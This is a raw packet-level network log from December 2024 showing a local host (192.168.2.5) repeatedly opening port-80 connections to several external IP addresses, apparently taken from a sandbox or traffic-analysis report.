                                                                                Dec 14, 2024 13:51:27.644563913 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644582033 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644674063 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644689083 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644705057 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644721985 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644738913 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:27.644813061 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:27.644824028 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644840956 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644857883 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644917965 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:27.644957066 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:27.649336100 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:27.769217014 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:33.927602053 CET5002880192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:34.048053980 CET8050028154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:34.048160076 CET5002880192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:34.131190062 CET5002880192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:34.251207113 CET8050028154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:35.606471062 CET8050028154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:35.606570005 CET8050028154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:35.606703043 CET5002880192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:35.640829086 CET5002880192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:36.678369045 CET5002980192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:36.799120903 CET8050029154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:36.799242973 CET5002980192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:36.890749931 CET5002980192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:37.010641098 CET8050029154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:38.352535963 CET8050029154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:38.352580070 CET8050029154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:38.352647066 CET5002980192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:38.406519890 CET5002980192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:39.429358959 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:39.549401045 CET8050030154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:39.552822113 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:39.569766045 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:39.689842939 CET8050030154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:39.689862967 CET8050030154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:41.083079100 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:41.123873949 CET8050030154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:41.124053955 CET8050030154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:41.124092102 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:41.125864983 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:41.206631899 CET8050030154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:41.206767082 CET5003080192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:42.114078045 CET5003180192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:42.233985901 CET8050031154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:42.234070063 CET5003180192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:42.245107889 CET5003180192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:42.365005970 CET8050031154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:44.674135923 CET8050031154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:44.674261093 CET8050031154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:44.674370050 CET5003180192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:44.677207947 CET5003180192.168.2.5154.208.202.225
                                                                                Dec 14, 2024 13:51:44.797693014 CET8050031154.208.202.225192.168.2.5
                                                                                Dec 14, 2024 13:51:50.331562042 CET5003280192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:50.451354027 CET805003277.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:50.451499939 CET5003280192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:50.466197014 CET5003280192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:50.586494923 CET805003277.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:51.687136889 CET805003277.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:51.687191010 CET805003277.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:51.687251091 CET5003280192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:51.973761082 CET5003280192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:53.009957075 CET5003380192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:53.130213022 CET805003377.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:53.130331993 CET5003380192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:53.316035986 CET5003380192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:53.436017990 CET805003377.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:54.365017891 CET805003377.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:54.365058899 CET805003377.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:54.365293980 CET5003380192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:54.829490900 CET5003380192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:55.858445883 CET5003480192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:55.978401899 CET805003477.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:55.981970072 CET5003480192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:56.000159979 CET5003480192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:56.120301008 CET805003477.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:56.120325089 CET805003477.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:57.217530966 CET805003477.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:57.217609882 CET805003477.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:57.217665911 CET5003480192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:57.500210047 CET5003480192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:58.521277905 CET5003580192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:58.641407013 CET805003577.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:58.643979073 CET5003580192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:58.653287888 CET5003580192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:58.773194075 CET805003577.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:59.883641958 CET805003577.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:59.883687019 CET805003577.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:51:59.883910894 CET5003580192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:51:59.906215906 CET5003580192.168.2.577.68.64.45
                                                                                Dec 14, 2024 13:52:00.027117014 CET805003577.68.64.45192.168.2.5
                                                                                Dec 14, 2024 13:52:06.153935909 CET5003880192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:06.273936033 CET8050038208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:06.274025917 CET5003880192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:06.290647984 CET5003880192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:06.410499096 CET8050038208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:07.434046984 CET8050038208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:07.434173107 CET5003880192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:07.797492981 CET5003880192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:07.917608976 CET8050038208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:08.879821062 CET5003980192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:08.999808073 CET8050039208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:09.003803015 CET5003980192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:09.102816105 CET5003980192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:09.223694086 CET8050039208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:10.170749903 CET8050039208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:10.170829058 CET5003980192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:10.609472990 CET5003980192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:10.729408979 CET8050039208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:11.647800922 CET5004080192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:11.768579006 CET8050040208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:11.769782066 CET5004080192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:11.848484039 CET5004080192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:11.968461037 CET8050040208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:11.968477964 CET8050040208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:12.930874109 CET8050040208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:12.932527065 CET5004080192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:13.360250950 CET5004080192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:13.480169058 CET8050040208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:14.390959024 CET5004180192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:14.511137009 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:14.511219978 CET5004180192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:14.525094986 CET5004180192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:14.645087957 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:15.990859032 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:15.990881920 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:15.990911961 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:15.990923882 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:15.991017103 CET5004180192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:15.996864080 CET5004180192.168.2.5208.91.197.27
                                                                                Dec 14, 2024 13:52:16.120071888 CET8050041208.91.197.27192.168.2.5
                                                                                Dec 14, 2024 13:52:21.571973085 CET5004280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:21.691864967 CET805004284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:21.692924023 CET5004280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:21.707577944 CET5004280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:21.827395916 CET805004284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:22.793754101 CET805004284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:22.793819904 CET5004280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:23.226217031 CET5004280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:23.347759962 CET805004284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:24.238238096 CET5004380192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:24.358184099 CET805004384.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:24.358299971 CET5004380192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:24.374974966 CET5004380192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:24.495177984 CET805004384.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:25.457454920 CET805004384.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:25.457591057 CET5004380192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:25.893701077 CET5004380192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:26.013636112 CET805004384.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:26.910151005 CET5004480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:27.031445980 CET805004484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:27.032990932 CET5004480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:27.053821087 CET5004480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:27.174104929 CET805004484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:27.174262047 CET805004484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:28.132708073 CET805004484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:28.132802963 CET5004480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:28.571211100 CET5004480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:28.693712950 CET805004484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:29.581796885 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:29.702440023 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:29.703347921 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:29.711357117 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:29.831481934 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801634073 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801707983 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801719904 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801841021 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:30.801845074 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801858902 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801868916 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.801903963 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:30.801920891 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:30.802011013 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.802022934 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.802056074 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:30.802196980 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.802977085 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:30.803026915 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:30.806361914 CET5004580192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:52:30.927823067 CET805004584.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:52:36.157856941 CET5004680192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:36.277847052 CET8050046104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:36.285832882 CET5004680192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:36.297832966 CET5004680192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:36.420831919 CET8050046104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:37.562068939 CET8050046104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:37.562100887 CET8050046104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:37.562249899 CET5004680192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:37.562588930 CET8050046104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:37.562640905 CET5004680192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:37.797219038 CET5004680192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:38.824812889 CET5004780192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:38.944919109 CET8050047104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:38.947334051 CET5004780192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:38.965279102 CET5004780192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:39.085258007 CET8050047104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:40.212050915 CET8050047104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:40.212095022 CET8050047104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:40.212158918 CET8050047104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:40.212187052 CET5004780192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:40.212229967 CET5004780192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:40.469404936 CET5004780192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:41.488559008 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:41.608597994 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:41.608697891 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:41.626995087 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:41.747020960 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:41.747037888 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888066053 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888129950 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888425112 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888647079 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:42.888647079 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:43.140744925 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.159674883 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.280035973 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:44.280427933 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.289949894 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.409967899 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.556891918 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.556916952 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.557053089 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:45.557363033 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.557403088 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:45.560637951 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:45.682508945 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:50.896378994 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:51.016529083 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:51.016639948 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:51.031285048 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:51.151436090 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.335288048 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.335350037 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.336502075 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.336544991 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:52.340511084 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:52.549969912 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.566618919 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.686636925 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:53.686769962 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.718107939 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.839188099 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.020826101 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.020905972 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.020976067 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:55.021411896 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.021495104 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:55.234499931 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.253855944 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.374768972 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:56.374950886 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.389866114 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.509886980 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:56.509943962 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703147888 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703166008 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703181028 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703236103 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:57.890809059 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:58.912405014 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:59.032423973 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:59.032521963 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:59.044490099 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:59.164346933 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357136965 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357352972 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357395887 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357433081 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357479095 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.357573986 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357609987 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357645988 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.357646942 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357687950 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357805967 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.358001947 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.358040094 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.358374119 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.361609936 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.361968994 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.364458084 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.484319925 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:05.965297937 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:06.085382938 CET8050054162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:06.085531950 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:06.101859093 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:06.222222090 CET8050054162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:07.609519005 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:07.730220079 CET8050054162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:07.730307102 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.633867979 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.753827095 CET8050057162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:08.754116058 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.768383980 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.888506889 CET8050057162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:10.281537056 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:10.401767969 CET8050057162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:10.401870966 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.300442934 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.420564890 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:11.420651913 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.435384989 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.556296110 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:11.556329966 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:12.937669039 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.018359900 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.018394947 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.018412113 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.018532991 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.018532991 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.018532991 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.062555075 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.062669039 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.957036018 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:14.077804089 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:14.080085993 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:14.092714071 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:14.212802887 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421649933 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421708107 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421750069 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421803951 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:15.421843052 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:15.424978018 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:15.544811964 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:21.071619987 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:21.192873001 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:21.193037987 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:21.208895922 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:21.329447031 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:22.487040997 CET805006081.2.196.19192.168.2.5
